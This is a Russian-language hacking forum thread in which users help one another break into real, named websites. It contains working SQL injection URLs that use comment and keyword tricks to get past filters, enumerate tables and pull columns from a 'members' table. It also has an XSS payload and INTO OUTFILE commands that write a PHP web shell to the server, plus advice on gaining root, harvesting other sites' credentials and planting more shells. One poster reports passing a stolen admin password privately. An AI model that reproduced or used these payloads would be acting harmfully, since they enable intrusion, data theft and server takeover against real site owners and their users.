во первых желатильней код шела в значение хекс преоброзовать, во вторых убедись что кавычки не фильтруются и не слешируются...
Code: http://www.bluegrassmidwest.com/details.php?id=-6'/**/union/**/select/**/*/**/from/**/(select/**/1)x/**/join/**/(select/**/version())y/**/join(select/**/table_name/**/from/**/information_schema.tables)z/**/join(select/**/database())a/**/join(select/**/5)b/**/join(select/**/6)c/**/join(select/**/7)d/**/join(select/**/8)e/**/join(select/**/9)f/**/join(select/**/10)g/**/join(select/**/11)h/* Code: CHARACTER_SETS Но мы не сможем юзать /**/limit/**/0,1. Ведь там запятая, которая фильтруется. Поэтому попробуем group_concat: Code: http://www.bluegrassmidwest.com/details.php?id=-6'/**/union/**/select/**/*/**/from/**/(select/**/1)x/**/join/**/(select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/)y/**/join(select/**/5)z/**/join(select/**/4)a/**/join(select/**/5)b/**/join(select/**/6)c/**/join(select/**/7)d/**/join(select/**/8)e/**/join(select/**/9)f/**/join(select/**/10)g/**/join(select/**/11)h/* Видим members. Еще один ньюанс. Оказывается, что фильтруется и "=". Т.e. where/**/table_name='members' юзать невозможно. Но зато есть LIKE: Code: http://www.bluegrassmidwest.com/details.php?id=-6'/**/union/**/select/**/*/**/from/**/(select/**/1)x/**/join/**/(select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name/**/like/**/'members')y/**/join(select/**/5)z/**/join(select/**/4)a/**/join(select/**/5)b/**/join(select/**/6)c/**/join(select/**/7)d/**/join(select/**/8)e/**/join(select/**/9)f/**/join(select/**/10)g/**/join(select/**/11)h/* Code: memberID,lname,fname,email и т.д. P.S. Можно еще в XSS превратить: Code: http://www.bluegrassmidwest.com/details.php?id=-6'/**/union/**/select/**/*/**/from/**/(select/**/1)x/**/join/**/(select/**/[COLOR=Yellow]%3Cscript%3Ealert('Privet!')%3C/script%3E[/COLOR]/**/from/**/members)y/**/join(select/**/5)z/**/join(select/**/4)a/**/join(select/**/5)b/**/join(select/**/6)c/**/join(select/**/7)d/**/join(select/**/8)e/**/join(select/**/9)f/**/join(select/**/10)g/**/join(select/**/11)h/* 2OxoTnik, Code: +union+select+1,2,'<? system($_GET[a]); ?>',4,5,6,7,8+into+outfile+'/var/www/shell.php'-- Папка доступна на запись? При выполнении error не выскакивает? Если да, то ищи другие папки. Проверь MQ.
Code: select '<? system($_GET[a]); ?>' from table_name into outfile '/var/www/shell.php'; или попробуй так: Code: select '<? system($_GET[a]); ?>' from mysql.user into outfile '/var/www/shell.php'
а вот такой вопрос, короче тут слепая скуля, наугад в пару запросов нашол таблицу users и колонку passwd осталось добыть пароль, и тут возникла проблема, через пхп скрипт немогу перебрать так как при откритии урала в ответе от сайта только ответ о том что неустановлен какойто плагин, хавидж не может ничего сделать, какие могут быть предложеня?
Если хавидж не берет, значит раскрутить это нельзя!!! XDDD Какие тут могут быть предложения... Крути ручками или ищи еще какие-то программы (sqlmap, Toolza, даже не знаю какие еще существуют), иногда бывает проще написать скрипт для дампа самому. З.Ы: Отправил логин-пароль админа в личку.
Такая проблема, залил шел на сайт, зашёл на шел оказался в /home/gtrxuoxn/public_html/images/, далее перешёл в раздел /home/, а там около 3х тыщ сайтов и не на одном нельзя править править файлы даже не везде можно загрузить файл, что тут можно сделать??
Попытайся получить root-права на этой машине (тебе Сюда) Выложи туда конфигурацию сервера согласно примеру из 1ого поста и возможно тебе помогут :3
muljtik, найди на сайтах папки с правами на запись и выполнение, залей туда шеллы. Если крупные сайты, можно поискать баги в скриптах.
Да, на некоторых доменах в не которые папки есть возможность залить шелл, но всё равно когда захожу на только что залитый шелл им нельзя править индексную страницу... хочу получить полный доступ к серверу но не знаю как, выполнил пару команд $ uname -a Linux cpanel12.per.syra.net.au 2.6.18-274.7.1.el5 #1 SMP Thu Oct 20 16:21:01 EDT 2011 x86_64 x86_64 x86_64 GNU/Linux $ cat /etc/redhat-release CentOS release 5.7 (Final) поискал сплойт на exploit-db.com, без успешно
2muljtik, 2.6.18-274.7.1.el5 под него нет пока сплойтов(мб и есть). Попробуй прочитать конфиги других сайтов, узнать пароль и уже из админки тех сайтов заливать шелл.
будет ли разница если я залью шелл через админку или через шелл на другом сайте найду папку с правами на загрузку файлов и залью туда другой шелл
http://esus.ru/php/content.php?id=2775+union+select+1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9-- помогите вывести столбцы, или это blind?? хотя хавидж не определил что блайнд поэтому и обращяюсь
Такой вопрос, подобрал столбцы, версию и тп выыводит нормально, при попытке вывести данние таблиц выводит ошибку почему?
Code: http://www.europeeye.ro/detalii?id=7+union+select+1,unhex(hex(table_name)),3,4,5,6+from+information_schema.tables+--+
